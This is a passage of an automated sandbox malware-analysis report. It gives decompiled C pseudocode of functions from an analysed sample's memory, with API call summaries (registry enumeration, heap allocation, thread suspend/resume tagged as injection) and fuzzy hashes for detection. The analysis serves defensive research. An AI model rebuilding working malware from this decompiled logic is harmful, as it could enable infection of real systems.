				if(_v8 != 0) {
					E049D7424(_t54);
				}
				return _t45;
			}



















                              0x049d4c56
                              0x049d4c66
                              0x049d4c69
                              0x049d4c70
                              0x049d4c72
                              0x049d4c72
                              0x049d4c75
                              0x049d4c7a
                              0x049d4c81
                              0x049d4c8e
                              0x049d4c93
                              0x049d4c97
                              0x049d4ca5
                              0x049d4cb3
                              0x049d4cb7
                              0x049d4d48
                              0x049d4d48
                              0x049d4cbd
                              0x049d4cbd
                              0x049d4cc2
                              0x049d4cc2
                              0x049d4cc9
                              0x049d4cd5
                              0x049d4cd7
                              0x049d4cd9
                              0x049d4cdb
                              0x049d4ce2
                              0x049d4cf4
                              0x049d4cf6
                              0x049d4cfd
                              0x049d4cff
                              0x049d4d06
                              0x049d4d11
                              0x049d4d11
                              0x049d4cfd
                              0x049d4d16
                              0x049d4d1b
                              0x049d4d22
                              0x049d4d32
                              0x049d4d40
                              0x049d4d42
                              0x049d4d42
                              0x049d4cd9
                              0x049d4d54
                              0x049d4d54
                              0x049d4d56
                              0x049d4d5b
                              0x049d4d5d
                              0x049d4d5d
                              0x049d4d68

                              APIs
                              • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,058193B8,00000000,?,747DF710,00000000,747DF730), ref: 049D4CA5
                              • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,058193F0,?,00000000,30314549,00000014,004F0053,058193AC), ref: 049D4D42
                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,049D50D9), ref: 049D4D54
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: FreeHeap
                              • String ID: Uxt
                              • API String ID: 3298025750-1536154274
                              • Opcode ID: a3151402a055f57a11ce209063c9fc6c737c341ed7fcbcd70d80db1888bb43a2
                              • Instruction ID: ff9536ad1aff15731dfd462916c66138ded7f5fdfcc009e6f44db3b4e5bda3e2
                              • Opcode Fuzzy Hash: a3151402a055f57a11ce209063c9fc6c737c341ed7fcbcd70d80db1888bb43a2
                              • Instruction Fuzzy Hash: DD318F76900108BFEF11DFA4DD88EEA7BBDEB44704F158276E609AB060D670BE44CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D5B5B, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76memoryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 50%
                              			E049D5B5B(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t18;
				void* _t24;
				void* _t30;
				void* _t37;
				void* _t40;
				intOrPtr _t42;

				_t37 = __edx;
				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t42 =  *0x49dd370; // 0x5819b68
				_push(0x800);
				_push(0);
				_push( *0x49dd270);
				if( *0x49dd284 >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t30 = 8;
						L7:
						if(_t30 != 0) {
							L10:
							 *0x49dd284 =  *0x49dd284 + 1;
							L11:
							return _t30;
						}
						_t44 = _a4;
						_t40 = _v8;
						 *_a16 = _a4;
						 *_a20 = E049D47A4(_t44, _t40); // executed
						_t18 = E049D6A16(_t40, _t44); // executed
						if(_t18 != 0) {
							 *_a8 = _t40;
							 *_a12 = _t18;
							if( *0x49dd284 < 5) {
								 *0x49dd284 =  *0x49dd284 & 0x00000000;
							}
							goto L11;
						}
						_t30 = 0xbf;
						E049D55F1();
						HeapFree( *0x49dd270, 0, _t40);
						goto L10;
					}
					_t24 = E049D6367(_a4, _t32, _t37, _t42,  &_v8,  &_a4, _t13);
					L5:
					_t30 = _t24;
					goto L7;
				}
				if(RtlAllocateHeap() == 0) {
					goto L6;
				}
				_t24 = E049D7132(_a4, _t32, _t37, _t42,  &_v8,  &_a4, _t25);
				goto L5;
			}











                              0x049d5b5b
                              0x049d5b5b
                              0x049d5b5e
                              0x049d5b5f
                              0x049d5b69
                              0x049d5b70
                              0x049d5b75
                              0x049d5b77
                              0x049d5b7d
                              0x049d5ba5
                              0x049d5bbd
                              0x049d5bbf
                              0x049d5bc0
                              0x049d5bc2
                              0x049d5c00
                              0x049d5c00
                              0x049d5c06
                              0x049d5c0c
                              0x049d5c0c
                              0x049d5bc4
                              0x049d5bca
                              0x049d5bcd
                              0x049d5bdc
                              0x049d5bde
                              0x049d5be5
                              0x049d5c19
                              0x049d5c1e
                              0x049d5c20
                              0x049d5c22
                              0x049d5c22
                              0x00000000
                              0x049d5c20
                              0x049d5be7
                              0x049d5bec
                              0x049d5bfa
                              0x00000000
                              0x049d5bfa
                              0x049d5bb4
                              0x049d5bb9
                              0x049d5bb9
                              0x00000000
                              0x049d5bb9
                              0x049d5b87
                              0x00000000
                              0x00000000
                              0x049d5b96
                              0x00000000

                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,00000800,747DF710), ref: 049D5B7F
                                • Part of subcall function 049D7132: GetTickCount.KERNEL32 ref: 049D7146
                                • Part of subcall function 049D7132: wsprintfA.USER32 ref: 049D7196
                                • Part of subcall function 049D7132: wsprintfA.USER32 ref: 049D71B3
                                • Part of subcall function 049D7132: wsprintfA.USER32 ref: 049D71DF
                                • Part of subcall function 049D7132: HeapFree.KERNEL32(00000000,?), ref: 049D71F1
                                • Part of subcall function 049D7132: wsprintfA.USER32 ref: 049D7212
                                • Part of subcall function 049D7132: HeapFree.KERNEL32(00000000,?), ref: 049D7222
                                • Part of subcall function 049D7132: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 049D7250
                                • Part of subcall function 049D7132: GetTickCount.KERNEL32 ref: 049D7261
                              • RtlAllocateHeap.NTDLL(00000000,00000800,747DF710), ref: 049D5B9D
                              • HeapFree.KERNEL32(00000000,?,?,?,049D512B,00000002,?,?,?,?), ref: 049D5BFA
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: Heap$wsprintf$AllocateFree$CountTick
                              • String ID: Uxt
                              • API String ID: 1676223858-1536154274
                              • Opcode ID: 2e3e8d7451437079ce43d718dd6c41fe6af761da5a8b2099850a5938552ee4b8
                              • Instruction ID: d6c981854f9712e8d2e5a91af1e850f5e3906434802ee75c733b8abfb06d8c94
                              • Opcode Fuzzy Hash: 2e3e8d7451437079ce43d718dd6c41fe6af761da5a8b2099850a5938552ee4b8
                              • Instruction Fuzzy Hash: 79214F75206209FFDB119FA4D940E9A3BBDEF48354F018136FA0197140EB78ED41DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D4788, Relevance: 6.1, APIs: 4, Instructions: 120synchronizationCOMMON
                              Download Yara Rule
                              C-Code - Quality: 62%
                              			E049D4788(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				void* _t41;
				char* _t42;
				long _t43;
				void* _t46;
				intOrPtr _t47;
				intOrPtr* _t48;
				char _t50;
				long _t54;
				char* _t55;
				long _t56;
				intOrPtr* _t57;
				void* _t60;
				void* _t61;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t74;
				void* _t78;

				_t72 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t41 = _t72;
					_pop(_t73);
					_t74 = _t41;
					_t42 =  &_v12;
					_v8 = 0;
					_v16 = 0;
					__imp__( *((intOrPtr*)(_t74 + 0x18)), _t42, _t68, _t73, _t61, _t78); // executed
					if(_t42 == 0) {
						_t43 = GetLastError();
						_v8 = _t43;
						if(_t43 == 0x2efe) {
							_v8 = 0;
							goto L29;
						}
					} else {
						if(_v12 == 0) {
							L29:
							 *((intOrPtr*)(_t74 + 0x30)) = 0;
						} else {
							_t46 =  *0x49dd130(0, 1,  &_v24); // executed
							if(_t46 != 0) {
								_v8 = 8;
							} else {
								_t47 = E049D55DC(0x1000);
								_v20 = _t47;
								if(_t47 == 0) {
									_v8 = 8;
								} else {
									goto L8;
									do {
										while(1) {
											L8:
											_t50 = _v12;
											if(_t50 >= 0x1000) {
												_t50 = 0x1000;
											}
											__imp__( *((intOrPtr*)(_t74 + 0x18)), _v20, _t50,  &_v16);
											if(_t50 == 0) {
												break;
											}
											_t57 = _v24;
											 *((intOrPtr*)( *_t57 + 0x10))(_t57, _v20, _v16, 0);
											_t18 =  &_v12;
											 *_t18 = _v12 - _v16;
											if( *_t18 != 0) {
												continue;
											} else {
											}
											L14:
											if(WaitForSingleObject( *0x49dd2a4, 0) != 0x102) {
												_v8 = 0x102;
											} else {
												_t55 =  &_v12;
												__imp__( *((intOrPtr*)(_t74 + 0x18)), _t55); // executed
												if(_t55 != 0) {
													goto L19;
												} else {
													_t56 = GetLastError();
													_v8 = _t56;
													if(_t56 == 0x2f78 && _v12 == 0) {
														_v8 = 0;
														goto L19;
													}
												}
											}
											L22:
											E049D6DFA(_v20);
											if(_v8 == 0) {
												_t54 = E049D44E4(_v24, _t74); // executed
												_v8 = _t54;
											}
											goto L25;
										}
										_v8 = GetLastError();
										goto L14;
										L19:
									} while (_v12 != 0);
									goto L22;
								}
								L25:
								_t48 = _v24;
								 *((intOrPtr*)( *_t48 + 8))(_t48);
							}
						}
					}
					return _v8;
				} else {
					_t60 = E049D301A(__eax); // executed
					if(_t60 != 0) {
						return _t60;
					} else {
						goto L2;
					}
				}
			}



























                              0x049d4789
                              0x049d478f
                              0x049d479a
                              0x049d479a
                              0x049d479c
                              0x049d8a1b
                              0x049d8a1e
                              0x049d8a27
                              0x049d8a2a
                              0x049d8a2d
                              0x049d8a35
                              0x049d8b33
                              0x049d8b3e
                              0x049d8b41
                              0x049d8b43
                              0x00000000
                              0x049d8b43
                              0x049d8a3b
                              0x049d8a3e
                              0x049d8b46
                              0x049d8b46
                              0x049d8a44
                              0x049d8a4b
                              0x049d8a53
                              0x049d8b2a
                              0x049d8a59
                              0x049d8a5f
                              0x049d8a66
                              0x049d8a69
                              0x049d8b18
                              0x049d8a6f
                              0x00000000
                              0x049d8a6f
                              0x049d8a6f
                              0x049d8a6f
                              0x049d8a6f
                              0x049d8a74
                              0x049d8a76
                              0x049d8a76
                              0x049d8a83
                              0x049d8a8b
                              0x00000000
                              0x00000000
                              0x049d8a8d
                              0x049d8a9a
                              0x049d8aa0
                              0x049d8aa0
                              0x049d8aa3
                              0x00000000
                              0x00000000
                              0x049d8aa5
                              0x049d8ab0
                              0x049d8ac4
                              0x049d8afa
                              0x049d8ac6
                              0x049d8ac6
                              0x049d8acd
                              0x049d8ad5
                              0x00000000
                              0x049d8ad7
                              0x049d8ad7
                              0x049d8ae2
                              0x049d8ae5
                              0x049d8aec
                              0x00000000
                              0x049d8aec
                              0x049d8ae5
                              0x049d8ad5
                              0x049d8afd
                              0x049d8b00
                              0x049d8b08
                              0x049d8b0e
                              0x049d8b13
                              0x049d8b13
                              0x00000000
                              0x049d8b08
                              0x049d8aad
                              0x00000000
                              0x049d8aef
                              0x049d8aef
                              0x00000000
                              0x049d8af8
                              0x049d8b1f
                              0x049d8b1f
                              0x049d8b25
                              0x049d8b25
                              0x049d8a53
                              0x049d8a3e
                              0x049d8b50
                              0x049d4791
                              0x049d4791
                              0x049d4798
                              0x049d47a3
                              0x00000000
                              0x00000000
                              0x00000000
                              0x049d4798

                              APIs
                              • WaitForSingleObject.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,74785520,049D654E,?,?), ref: 049D8AB7
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,74785520,049D654E,?,?,?), ref: 049D8AD7
                                • Part of subcall function 049D301A: wcstombs.NTDLL ref: 049D30DA
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: ErrorLastObjectSingleWaitwcstombs
                              • String ID:
                              • API String ID: 2344289193-0
                              • Opcode ID: e79c479c55421a88ee8a81a2e09ccc1dae0d1ce7cd947fa3a1f71045cb7bd325
                              • Instruction ID: 6a0157174997cead06a3c8dc613a95ff0a896c36d145a8ef13b755c9ea3b007c
                              • Opcode Fuzzy Hash: e79c479c55421a88ee8a81a2e09ccc1dae0d1ce7cd947fa3a1f71045cb7bd325
                              • Instruction Fuzzy Hash: 2B412DB1A01209EFDF20EFA5D9849AEBBB9FF44345F10847AE512E7151E734AE80DB10
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053C2520, Relevance: 6.1, APIs: 4, Instructions: 108threadsynchronizationinjectionCOMMON
                              Download Yara Rule
                              APIs
                              • memset.NTDLL ref: 053C254E
                              • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 053C25D8
                              • WaitForSingleObject.KERNEL32(00000064), ref: 053C25E6
                              • SuspendThread.KERNEL32(?), ref: 053C25F9
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Thread$ObjectResumeSingleSuspendWaitmemset
                              • String ID:
                              • API String ID: 3168247402-0
                              • Opcode ID: 122b4a784a8726cf5b78c4ab95a233d413c50515edf4db90766f408ca7d15258
                              • Instruction ID: a5ed277b6642564ea373d37f05a6cebdf63baf523b8a9da4c0f40bfae4034cf4
                              • Opcode Fuzzy Hash: 122b4a784a8726cf5b78c4ab95a233d413c50515edf4db90766f408ca7d15258
                              • Instruction Fuzzy Hash: 15418D71108301AFE721DF54C845E6BBFEABF88754F00092DFAD4961A0DBB1D964CB62
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049DA614, Relevance: 6.1, APIs: 4, Instructions: 98registrysynchronizationCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E049DA614(void* __ecx, intOrPtr _a4) {
				int* _v8;
				int _v12;
				int* _v16;
				int _v20;
				int* _v24;
				char* _v28;
				void* _v32;
				long _t33;
				char* _t35;
				long _t39;
				long _t42;
				intOrPtr _t47;
				void* _t51;
				long _t53;

				_t51 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed
				_t53 = _t33;
				if(_t53 != 0) {
					L18:
					return _t53;
				}
				_t53 = 8;
				_t35 = E049D55DC(0x104);
				_v28 = _t35;
				if(_t35 == 0) {
					L17:
					RegCloseKey(_v32);
					goto L18;
				}
				_v20 = 0x104;
				do {
					_v16 = _v20;
					_v12 = 0x104;
					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed
					_t53 = _t39;
					if(_t53 != 0xea) {
						if(_t53 != 0) {
							L14:
							if(_t53 == 0x103) {
								_t53 = 0;
							}
							L16:
							E049D6DFA(_v28);
							goto L17;
						}
						_t42 = E049D48E5(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed
						_t53 = _t42;
						if(_t53 != 0) {
							goto L14;
						}
						goto L12;
					}
					if(_v12 <= 0x104) {
						if(_v16 <= _v20) {
							goto L16;
						}
						E049D6DFA(_v24);
						_v20 = _v16;
						_t47 = E049D55DC(_v16);
						_v24 = _t47;
						if(_t47 != 0) {
							L6:
							_t53 = 0;
							goto L12;
						}
						_t53 = 8;
						goto L16;
					}
					_v8 = _v8 + 1;
					goto L6;
					L12:
				} while (WaitForSingleObject( *0x49dd2a4, 0) == 0x102);
				goto L16;
			}

















                              0x049da614
                              0x049da62e
                              0x049da631
                              0x049da634
                              0x049da637
                              0x049da63a
                              0x049da640
                              0x049da644
                              0x049da71e
                              0x049da722
                              0x049da722
                              0x049da64d
                              0x049da654
                              0x049da65b
                              0x049da65e
                              0x049da713
                              0x049da716
                              0x00000000
                              0x049da71c
                              0x049da664
                              0x049da667
                              0x049da66e
                              0x049da678
                              0x049da681
                              0x049da687
                              0x049da68f
                              0x049da6c7
                              0x049da701
                              0x049da707
                              0x049da709
                              0x049da709
                              0x049da70b
                              0x049da70e
                              0x00000000
                              0x049da70e
                              0x049da6dc
                              0x049da6e1
                              0x049da6e5
                              0x00000000
                              0x00000000
                              0x00000000
                              0x049da6e5
                              0x049da694
                              0x049da6a3
                              0x00000000
                              0x00000000
                              0x049da6a8
                              0x049da6b1
                              0x049da6b4
                              0x049da6bb
                              0x049da6be
                              0x049da699
                              0x049da699
                              0x00000000
                              0x049da699
                              0x049da6c2
                              0x00000000
                              0x049da6c2
                              0x049da696
                              0x00000000
                              0x049da6e7
                              0x049da6f4
                              0x00000000

                              APIs
                              • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,049D6096,?), ref: 049DA63A
                                • Part of subcall function 049D55DC: RtlAllocateHeap.NTDLL(00000000,00000000,049D552C), ref: 049D55E8
                              • RegEnumKeyExA.KERNEL32(?,?,?,049D6096,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,049D6096), ref: 049DA681
                              • WaitForSingleObject.KERNEL32(00000000,?,?,?,049D6096,?,049D6096,?,?,?,?,?,049D6096,?), ref: 049DA6EE
                              • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,049D6096,?), ref: 049DA716
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: AllocateCloseEnumHeapObjectOpenSingleWait
                              • String ID:
                              • API String ID: 3664505660-0
                              • Opcode ID: 7eea49179f9aed8f6c7f3b2f1767618846530dc6e55ff561c69b71d929ef889b
                              • Instruction ID: 85c94c0d84393a44a9f5e18e52475407d20a8b63143608b92d68c46e271730e6
                              • Opcode Fuzzy Hash: 7eea49179f9aed8f6c7f3b2f1767618846530dc6e55ff561c69b71d929ef889b
                              • Instruction Fuzzy Hash: 83311676D00119EBDF21AFA9DC849EEFFB9EB84314F108136E911B2150D6755A90DB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D6A4D, Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON
                              Download Yara Rule
                              APIs
                              • SysAllocString.OLEAUT32(80000002), ref: 049D6AA4
                              • SysAllocString.OLEAUT32(049D4993), ref: 049D6AE7
                              • SysFreeString.OLEAUT32(00000000), ref: 049D6AFB
                              • SysFreeString.OLEAUT32(00000000), ref: 049D6B09
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: String$AllocFree
                              • String ID:
                              • API String ID: 344208780-0
                              • Opcode ID: 0cb2b61d57ce41378524ca7bf4d3712a7ddc92c0b7602eebdd90e9be37990b6e
                              • Instruction ID: 2004334f3826d686b13972ee6be34b0ef43fd8579c14f265c6e830e3d628dc69
                              • Opcode Fuzzy Hash: 0cb2b61d57ce41378524ca7bf4d3712a7ddc92c0b7602eebdd90e9be37990b6e
                              • Instruction Fuzzy Hash: 55312C71904109EFCB05DF98C8C08AEBBB9FF48340B10853EF90A97210E779A985CFA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D6006, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                              Download Yara Rule
                              C-Code - Quality: 41%
                              			E049D6006(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t20;
				void* _t26;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t20 = E049D2E2E(__ecx,  &_v32); // executed
				_t38 = _t20;
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E049DA2A1(_t23);
						}
					}
					return _t38;
				}
				_t26 = E049D5EF5(0x40,  &_v16); // executed
				if(_t26 != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x49dd2e4, 1, 0,  *0x49dd374);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E049DA614(_t36); // executed
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E049D48E5(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E049D7424(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E049D4B5B( &_v32, _t39);
					goto L13;
				}
			}














                              0x049d6006
                              0x049d6013
                              0x049d6019
                              0x049d601a
                              0x049d601b
                              0x049d601c
                              0x049d601d
                              0x049d6021
                              0x049d6028
                              0x049d602d
                              0x049d6031
                              0x049d60b9
                              0x049d60b9
                              0x049d60bc
                              0x049d60be
                              0x049d60c6
                              0x049d60cc
                              0x049d60cf
                              0x049d60cf
                              0x049d60cc
                              0x049d60da
                              0x049d60da
                              0x049d603d
                              0x049d6044
                              0x049d6046
                              0x049d6046
                              0x049d605d
                              0x049d6061
                              0x049d6064
                              0x049d606f
                              0x049d6076
                              0x049d6076
                              0x049d6082
                              0x049d6083
                              0x049d6091
                              0x049d6085
                              0x049d6085
                              0x049d6086
                              0x049d6087
                              0x049d6088
                              0x049d6089
                              0x049d608a
                              0x049d608a
                              0x049d6096
                              0x049d609b
                              0x049d609d
                              0x049d609f
                              0x049d609f
                              0x049d60a6
                              0x00000000
                              0x049d60a8
                              0x049d60a8
                              0x049d60b5
                              0x00000000
                              0x049d60b5

                              APIs
                              • CreateEventA.KERNEL32(049DD2E4,00000001,00000000,00000040,?,?,747DF710,00000000,747DF730), ref: 049D6057
                              • SetEvent.KERNEL32(00000000), ref: 049D6064
                              • Sleep.KERNEL32(00000BB8), ref: 049D606F
                              • CloseHandle.KERNEL32(00000000), ref: 049D6076
                                • Part of subcall function 049DA614: RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,049D6096,?), ref: 049DA63A
                                • Part of subcall function 049DA614: RegEnumKeyExA.KERNEL32(?,?,?,049D6096,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,049D6096), ref: 049DA681
                                • Part of subcall function 049DA614: WaitForSingleObject.KERNEL32(00000000,?,?,?,049D6096,?,049D6096,?,?,?,?,?,049D6096,?), ref: 049DA6EE
                                • Part of subcall function 049DA614: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,049D6096,?), ref: 049DA716
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: CloseEvent$CreateEnumHandleObjectOpenSingleSleepWait
                              • String ID:
                              • API String ID: 891522397-0
                              • Opcode ID: d239170fc1b781cdc4b9d781ca12031daa7093360f2c6bd7e1a809638b2c7962
                              • Instruction ID: 5f7033069ee46da9f3954b91bd68efaeffe7e461955d57b6ab3326151db96cd5
                              • Opcode Fuzzy Hash: d239170fc1b781cdc4b9d781ca12031daa7093360f2c6bd7e1a809638b2c7962
                              • Instruction Fuzzy Hash: B221A472900119ABDF20AFEAC8848AEB7BDEF85354B05C536EA11E7100D735BD45CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D5607, Relevance: 6.1, APIs: 4, Instructions: 80registryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E049D5607(int _a4, int _a8, void* _a12, short* _a16, char** _a20, intOrPtr* _a24) {
				long _t26;
				intOrPtr* _t38;
				char* _t42;
				long _t43;

				if(_a4 == 0) {
					L2:
					_t26 = RegOpenKeyW(_a8, _a12,  &_a12); // executed
					_t43 = _t26;
					if(_t43 == 0) {
						RegQueryValueExW(_a12, _a16, 0,  &_a8, 0,  &_a4); // executed
						if(_a4 == 0) {
							_t43 = 0xe8;
						} else {
							_t42 = E049D55DC(_a4);
							if(_t42 == 0) {
								_t43 = 8;
							} else {
								_t43 = RegQueryValueExW(_a12, _a16, 0,  &_a8, _t42,  &_a4);
								if(_t43 != 0) {
									E049D6DFA(_t42);
								} else {
									 *_a20 = _t42;
									_t38 = _a24;
									if(_t38 != 0) {
										 *_t38 = _a4;
									}
								}
							}
						}
						RegCloseKey(_a12);
					}
					L12:
					return _t43;
				}
				_t43 = E049D8FEC(_a4, _a8, _a12, _a16, _a20, _a24);
				if(_t43 == 0) {
					goto L12;
				}
				goto L2;
			}







                              0x049d5613
                              0x049d5636
                              0x049d5640
                              0x049d5646
                              0x049d564a
                              0x049d5662
                              0x049d5667
                              0x049d56af
                              0x049d5669
                              0x049d5671
                              0x049d5675
                              0x049d56ac
                              0x049d5677
                              0x049d5689
                              0x049d568d
                              0x049d56a3
                              0x049d568f
                              0x049d5692
                              0x049d5694
                              0x049d5699
                              0x049d569e
                              0x049d569e
                              0x049d5699
                              0x049d568d
                              0x049d5675
                              0x049d56b7
                              0x049d56b7
                              0x049d56be
                              0x049d56c4
                              0x049d56c4
                              0x049d562c
                              0x049d5630
                              0x00000000
                              0x00000000
                              0x00000000

                              APIs
                              • RegOpenKeyW.ADVAPI32(80000002,05819C46,05819C46), ref: 049D5640
                              • RegQueryValueExW.KERNEL32(05819C46,?,00000000,80000002,00000000,00000000,?,049D49C4,3D049DC0,80000002,049D6096,00000000,049D6096,?,05819C46,80000002), ref: 049D5662
                              • RegQueryValueExW.ADVAPI32(05819C46,?,00000000,80000002,00000000,00000000,00000000,?,049D49C4,3D049DC0,80000002,049D6096,00000000,049D6096,?,05819C46), ref: 049D5687
                              • RegCloseKey.ADVAPI32(05819C46,?,049D49C4,3D049DC0,80000002,049D6096,00000000,049D6096,?,05819C46,80000002,00000000,?), ref: 049D56B7
                                • Part of subcall function 049D8FEC: SafeArrayDestroy.OLEAUT32(00000000), ref: 049D9071
                                • Part of subcall function 049D6DFA: RtlFreeHeap.NTDLL(00000000,00000000,049D55CD,00000000,?,?,00000000), ref: 049D6E06
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: QueryValue$ArrayCloseDestroyFreeHeapOpenSafe
                              • String ID:
                              • API String ID: 486277218-0
                              • Opcode ID: 746bc7c39a5f4a4a90d1ce96cb67572c37a2bc91c4e35eede19df6bdd913c40d
                              • Instruction ID: b03706e4610f3f146deff9eb3576b7f7cda2ab6b525b9876b611eaad32f5e877
                              • Opcode Fuzzy Hash: 746bc7c39a5f4a4a90d1ce96cb67572c37a2bc91c4e35eede19df6bdd913c40d
                              • Instruction Fuzzy Hash: A821397250015DBFDF11AE94DC80CEE7B6EFB482A0B468436FE159B120D731AD61DB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053E1F4C, Relevance: 6.1, APIs: 4, Instructions: 64memoryregistryCOMMON
                              Download Yara Rule
                              APIs
